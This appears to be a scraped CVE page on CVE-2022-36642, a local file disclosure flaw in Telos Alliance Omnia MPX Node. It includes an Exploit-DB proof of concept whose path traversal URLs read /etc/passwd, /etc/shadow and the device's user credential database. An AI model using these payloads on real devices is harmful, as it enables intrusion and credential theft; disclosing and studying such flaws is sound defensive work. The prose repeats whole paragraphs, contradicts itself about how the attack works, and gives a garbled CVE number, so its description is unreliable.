CVE-2022-36642 Telos Alliance Omnia MPX Node through 1.0.0-1.4.9 has a local file disclosure vulnerability that allows attackers to access users credentials and gain initial access to the control panel with high privilege.

To exploit this vulnerability you need to send a request with a crafted body to the /appConfig/userDB.json endpoint of Telos Alliance Omnia MPX Node and if you succeed you will receive an HTTP status of 200, also the attacker will receive an access token which can be used to access the node via the node access token. In order to exploit this vulnerability you need to send a request with a crafted body to the /appConfig/userDB.json endpoint of Telos Alliance Omnia MPX Node and if you succeed you will receive an HTTP status of 200, also the attacker will receive an access token which can be used to access the node via the node access token. Telos Alliance Omnia MPX Node through 1.0.0-1.4.9 suffers from another local file disclosure vulnerability through the /teamDB.json endpoint which allows attackers to access the contents of the team database which can be used to gain access to the node with high privilege. Telos Alliance Omnia MPX Node through 1.0.0-1.4.9 suffers from another local file disclosure vulnerability through the /teamDB.json endpoint which allows attackers to access the contents of the team database which can be used to gain access to the node with high privilege.

Summary

A vulnerability in the Telos Alliance Omnia MPX Node which can be exploited by sending a crafted HTTP request to the /appConfig/userDB.json endpoint.
The vulnerability requires that you have already connected to the node and has access to a user account on the system.
The vulnerability is avoidable if your application restricts access to the /appConfig/userDB.json endpoint.

CVE-2016-2022 -36642

Telos Alliance Omnia MPX Node through 1.0.0-1.4.9 suffers from another local file disclosure vulnerability through the /appConfig/userDB.json endpoint which allows attackers to access the contents of the user database which can be used to gain access to the node with high privilege. Telos Alliance Omnia MPX Node through 1.0.0-1.4.9 suffers from another local file disclosure vulnerability through the /appConfig/userDB.json endpoint which allows attackers to access the contents of the user database which can be used to gain access to the node with high privilege.

Exploit

# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
# Date: 24/7/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.telosalliance.com/
# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
# Version: 1.5.0+r1
# Tested on: MacOS
# PoC:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow

User Database:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json

Timeline

Published on: 09/02/2022 22:15:00 UTC
Last modified on: 09/23/2022 00:15:00 UTC

References

• https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
• https://www.exploit-db.com/exploits/50996
• https://drive.google.com/drive/folders/1jm9h8JNmezTt7AbHYRY7gPC4lXGDNklL
• https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node
• https://cyber-guy.gitbook.io/cyber-guys-blog/blogs/bypassing-mpx-node-authentication-firmware-analysis
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36642